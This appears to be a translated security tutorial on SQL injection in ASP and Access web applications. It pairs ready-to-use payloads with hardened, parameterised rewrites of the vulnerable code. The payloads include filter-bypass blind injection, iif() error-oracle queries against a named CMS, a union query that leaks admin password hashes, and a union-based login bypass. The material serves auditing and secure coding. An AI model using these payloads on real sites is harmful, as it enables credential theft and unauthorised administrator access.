ASP + access SQL Injection tips

Source: Internet
Author: User

As attention to web security has grown, the code security of web applications has flourished: more and more security people are working in this field, and more application code vulnerabilities are being exposed. Comparatively few people study ASP application code security; after all, ASP is not as flexible and varied as PHP, and it has only a handful of vulnerability types. This article shares some tips on SQL injection and auditing in the ASP + Access environment. There are of course many more tips; please add your own.
0x01 Blind injection when "<", ">" and "=" are filtered
I have read the code of a number of ASP systems, and some programmers rely solely on filtering "<", ">", "=" and the single quote to defend against SQL injection, so that data cannot be guessed character by character. We know there are many ways to bypass this kind of filtering; the first that comes to mind is "between ... and". We will not discuss "between ... and" here but give another tip. Take the following SQL statement:

select * from table where id=SQL
SQL is the part we can construct. Suppose the page filters "<", ">" and "=" from the parameter it receives, and union cannot be used for injection. Without resorting to "between ... and", we construct the following:
select * from table where id=1 and (select asc(mid(username,1,1)) from admin where asc(mid(username,1,1)) in(97))
The in() clause tests whether the first character of the administrator's user name is a; 97 is the ASCII code of the character a.
0x02 Using the iif() function in Access injection
For some special injection points the Access iif() function is quite useful. For example, when the classic "and 1=1" / "and 1=2" test returns no visible difference on the page, Access cannot fall back on time-based injection the way MySQL can, but iif() can still turn that "no difference" page into a distinguishable one. Here I take an injection point in the Southern Data enterprise website management system v16 as an example. Look at the code:
Set rs = server.createobject("adodb.recordset")
SQL = "select * from Southidc_" & request("Range") & "Sort where ViewFlag and ParentID=" & ParentID & " order by ID asc"
rs.open SQL, conn, 1, 1
if conn.execute("select ID from Southidc_" & request("Range") & "Sort Where ViewFlag and ParentID=0").eof then
    response.write "no relevant information"
else
    do while not rs.eof
Careful readers will spot the injection point at a glance: request("Range") is used in two SQL statements. This injection point is special in that we get to supply part of the table name, but because the value is inserted into two SQL statements it is hard to exploit. Access has no comment character, so a union query must be used to close the statement, but because the value lands in two statements the union query is also executed in:
select ID from Southidc_"&request("Range")&"Sort Where ViewFlag and ParentID=0
If the number of columns does not match, an error is reported, because "select ID from Southidc_" queries one column while the earlier "select * from Southidc_" queries several, so no matter how we construct the SQL statement we cannot make the column counts match in both. Here we use the Access iif() function to force an error deliberately: when the condition is true, the column-count mismatch reports an error; when the condition is false, iif() forces a different error, and so blind injection becomes possible. For example, the submitted Range is:
NewsSort where 2=iif((1=1),2,'a') union select * from Southidc_News
Replace 1=1 with the injection condition. For example, submit the Range as:
NewsSort where 2=iif(((select top 1 asc(mid(AdminName,1,1)) from [Southidc_Admin])=97),2,'a') union select * from Southidc_News

An error is reported at this point (error 1):

This checks whether the first character of the administrator's user name is a. When the condition is true, error 1 is returned; when it is false, for example when we submit:
NewsSort where 2=iif(((select top 1 asc(mid(AdminName,1,1)) from [Southidc_Admin])=98),2,'a') union select * from Southidc_News

the iif function forces a different error (error 2):

2='a' forces a type conversion that always fails, giving "The data type in the standard expression does not match".
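Because the Range value is spliced in as part of a table name, it cannot be passed as a query parameter, so the defence on the application side is a whitelist of allowed table names plus a parameterised ParentID. The following is an added example written for this article, not code from the Southern Data system; the conn object, the Southidc_NewsSort table and the ParentID variable come from the code above, while the "product" mapping and the Southidc_ProductSort table are assumed names.

```vbscript
<%
' Map the user-supplied Range value onto a fixed set of table names.
' Anything not in the list is rejected, so the parameter can never add
' "where ... iif(...)" or "union select" to either query.
Function SortTableFor(rangeValue)
    Select Case LCase(Trim(rangeValue))
        Case "news"
            SortTableFor = "Southidc_NewsSort"
        Case "product"
            SortTableFor = "Southidc_ProductSort"   ' assumed table name, not from the page
        Case Else
            SortTableFor = ""
    End Select
End Function

Dim tbl, cmd, chk, rs
tbl = SortTableFor(Request("Range"))
If tbl = "" Then
    Response.Write "no relevant information"
    Response.End
End If

' ParentID travels as an integer parameter (3 = adInteger, 1 = adParamInput)
' instead of being concatenated, so neither query can be made to error on demand.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select ID from " & tbl & " where ViewFlag and ParentID = ?"
cmd.Parameters.Append cmd.CreateParameter("pid", 3, 1, , 0)
Set chk = cmd.Execute

If chk.EOF Then
    Response.Write "no relevant information"
Else
    ' Same whitelisted table, same typed parameter, now with the real ParentID
    cmd.CommandText = "select * from " & tbl & " where ViewFlag and ParentID = ? order by ID asc"
    cmd.Parameters(0).Value = CLng(ParentID)
    Set rs = cmd.Execute
    Do While Not rs.EOF
        Response.Write Server.HTMLEncode(rs("ID") & "") & "<br>"
        rs.MoveNext
    Loop
End If
%>
```

The whitelist is the important part: a table-name fragment is the one kind of input that no parameter binding can protect, so the only safe value is one the application itself chose.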
0x03 Access "database disclosure" through error messages
When it comes to Access "database disclosure", many people will think of the classic %5c vulnerability of Access, but that is not what is meant here. Rather, as with MSSQL and MySQL, data from the database is exposed through an error message. Look at a piece of code from a shopping-mall system:
<%
Server.ScriptTimeout = 20
Response.Charset = "gb2312"
scid = Request("scid")
if scid <> "" Then
    set Fr = lodo_Execute("Select region as Gid, region as GQuantity, Lodo_OrderForm.OrderState as OrderState, Lodo_OrderForm.OrderPayState as OrderPayState, Lodo_OrderForm.Ordernumber as Ordernumber from Lodo_ShopingCar, Lodo_OrderForm where Lodo_OrderForm.Ordernumber = region And region = " & scid)
    If Not (Fr.eof Or Fr.bof) then
        ' determine whether the order has been paid
        if Fr("OrderState") = 4 Or Fr("OrderState") = 5 Or Fr("OrderPayState") = 1 Then
            Response.write "..."   ' HTML list markup (omitted)
            Set Rs = lodo_Execute("Select Top " & Fr("GQuantity") & " Contents from Lodo_CGoods where Status = 1 And PurchaseOrder = '" & Fr("Ordernumber") & "' And GoodsID = " & Fr("Gid"))
            CGnum = 0
            Do While Not Rs.Eof And CGnum
Note the following code:
if Frs("OrderState")=4 Or Frs("OrderState")=5 Or Frs("OrderPayState")=1 Then
Frs("OrderState"), a value read from the database, is compared with the integer 4. The problem is that if we inject through a union query and control what Frs("OrderState") returns, the program throws an error when execution reaches Frs("OrderState")=4, and the Microsoft error page helpfully displays the offending data. For example, with the preceding SQL statement, we submit the following scid:
1 union select 1,2,adminpass,4,5 from lodo_adminuser

By controlling what Frs("OrderState") returns, we make it the administrator's password hash; when the page compares that value with 4 it raises an error, and the hash appears in the error message.

Code like this is not common, but it does exist, and it is a weak point.

0x04 Disasters caused by "on error resume next"
For the early %5c physical-path disclosure vulnerability of Access databases, many programmers fix the problem by adding an error-suppression line to conn.asp, the file that connects to the database. This does fix that vulnerability, but it can create other problems. Look at the code:
conn.asp:
<%
on error resume next
connstr = "Provider=microsoft.jet.oledb.4.0;data source=" & server.MapPath("inc/db.mdb")
set conn = server.CreateObject("adodb.connection")
conn.open connstr
%>
Then the code of test.asp:
<%
id = request("id")
id = cint(id)
set rs = server.CreateObject("adodb.recordset")
sql = "select * from news where id=" & id
rs.open sql, conn, 1, 3
response.write rs("news")
rs.close
set rs = nothing
%>
<%set conn = nothing%>
This code does not appear to have any vulnerability, yet it does have a SQL injection. If test.asp contains no "on error resume next" statement, submitting a non-integer id makes the page report an error and stop executing. But if conn.asp contains "on error resume next", test.asp does not report the error: it skips the failing statement id = cint(id), so id keeps its original string value, and execution continues! The end result is that the filter fails, leaving SQL injection and logic vulnerabilities.
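The scid check in 0x03 and the cint() conversion here fail for the same reason: the value is validated loosely, or not at all, and then concatenated into the SQL text, so any error suppression turns the check into a no-op. The following hardened test.asp is an added example, not code from the original article; it assumes conn.asp is included and still contains "on error resume next" as shown above, that the table and column are both named news as in the original, and that a valid id is a plain decimal integer.

```vbscript
<!--#include file="conn.asp"-->
<%
' conn.asp has switched on "on error resume next". Switch it off again for this page,
' so a failed conversion or query stops execution instead of being silently skipped.
On Error GoTo 0

Dim id, re, cmd, rs
id = Request("id")

' Fail closed: accept only 1-9 decimal digits. IsNumeric() is deliberately avoided
' because it also accepts forms such as "1e3", "&H1F", "1,000" and "-1".
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(id & "") Then
    Response.Write "invalid id"
    Response.End
End If
id = CLng(id)

' Parameterised query through ADODB.Command: the value is bound as an integer
' parameter (3 = adInteger, 1 = adParamInput) and never becomes part of the SQL text.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select news from news where id = ?"
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , id)
Set rs = cmd.Execute

If rs.EOF Then
    Response.Write "no such record"
Else
    ' Encode on output; rs("news") may be Null, so coerce it to a string first
    Response.Write Server.HTMLEncode(rs("news") & "")
End If
rs.Close
Set rs = Nothing
Set cmd = Nothing
Set conn = Nothing
%>
```

Two things matter here. "On Error GoTo 0" restores normal error handling for the rest of the page, so the included conn.asp can keep its own suppression without disabling the checks that follow. And the regular-expression check plus the typed parameter means the page never relies on an exception to reject bad input, which is exactly what "on error resume next" takes away.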
0x05 A new "universal password"
"Universal passwords" should be familiar to anyone involved in intrusion work, for example 'or'='or' and 'or''='. The principle is simple; take the following SQL statement:
sql = "select * from admin where UserName='"&username&"' And PassWord='"& password &"'"
The username and password variables are controllable. When we submit the username as 'or''=' and any password at all, we bypass the check and log in directly. To deal with this vulnerability, many programmers use code like the following:
<%
dim LoginName, LoginPassword, AdminName, Password, AdminPurview, Working, UserName, rs, sql, mycode
LoginName = trim(request.form("LoginName"))
LoginPassword = Md5(request.form("LoginPassword"))
mycode = trim(request.form("code"))
set rs = server.createobject("adodb.recordset")
sql = "select * from admin where AdminName='" & LoginName & "'"
rs.open sql, conn, 1, 3
if rs.eof then
    response.write ""
    response.end
else
    AdminName = rs("AdminName")
    Password = rs("Password")
    AdminPurview = rs("AdminPurview")
    Working = rs("Working")
    UserName = rs("UserName")
end if
if LoginPassword <> Password then
    response.write ""
    response.end
end if
'The login successful code is omitted
%>
The above code fixes the "universal password" login vulnerability but does not fundamentally solve the SQL injection problem. The password submitted by the user is compared with the Password returned by the database query, rs("Password"), but if we can use SQL to control what rs("Password") returns, we can log in with a "new universal password". For the code above, submit LoginName as:
' union select 1,2,'268a5c2004f54de708ee2ce0dac3c411',4,5,6 from admin where '1'='1
and the password my5t3ry, and you log straight into the system. 268a5c2004f54de708ee2ce0dac3c411 is the MD5 hash of my5t3ry. The number of columns after union select must match the admin table, and Password must be the third column, so the 3 is replaced with the MD5 hash; the value returned by rs("Password") is thus controlled through SQL injection, giving the "new universal password".
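The real fix is to stop the user name from reaching the SQL text at all; once the query is parameterised, rs("Password") can only ever hold the stored hash, and the MD5 comparison does what the author intended. The following is an added example, not code from the original article; it assumes the conn object and the Md5() function from the code above, an admin table with the columns named there, and an AdminName column of at most 50 characters.

```vbscript
<%
Dim LoginName, LoginPassword, cmd, rs
LoginName = Trim(Request.Form("LoginName") & "")
LoginPassword = Md5(Request.Form("LoginPassword") & "")   ' Md5() as used by the page

' The user name is bound as a typed text parameter (200 = adVarChar, 1 = adParamInput,
' size 50), so a quote or "union select" inside it is just data: the query can only
' ever return a real row of the admin table, and rs("Password") is the stored hash.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "select AdminName, Password, AdminPurview, Working, UserName " & _
                  "from admin where AdminName = ?"
cmd.Parameters.Append cmd.CreateParameter("name", 200, 1, 50, LoginName)
Set rs = cmd.Execute

' One generic answer for "unknown user" and "wrong password", so the response
' does not reveal which of the two failed.
If rs.EOF Then
    Response.Write "login failed"
    Response.End
End If
If LoginPassword <> (rs("Password") & "") Then
    Response.Write "login failed"
    Response.End
End If

' Login successful: the session setup is omitted, as in the original
Dim AdminName, AdminPurview, Working, UserName
AdminName = rs("AdminName")
AdminPurview = rs("AdminPurview")
Working = rs("Working")
UserName = rs("UserName")
rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

Selecting the columns by name rather than with "select *" is a small extra guard: the code no longer depends on Password happening to be the third column, which is the positional assumption the union payload in this section relies on.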
0x06 SQL statements without spaces
When performing SQL injection, spaces may be filtered. For example, the normal statement select id from table becomes selectidfromtable after filtering: everything is squeezed together and the injection fails. In Access, () and [] can be used to avoid spaces, so the statement above can be written as:
select(id)from[table]where[id]=1
This avoids spaces entirely. In addition, in MSSQL a space can be replaced by characters such as %09 and %0D0A; this also works in Access.
That is all I have to share on SQL injection and auditing in the ASP + Access environment; criticism is welcome. This article also draws on articles by experts such as oldjun, gogorq and lonely hedgehog; my thanks to them.
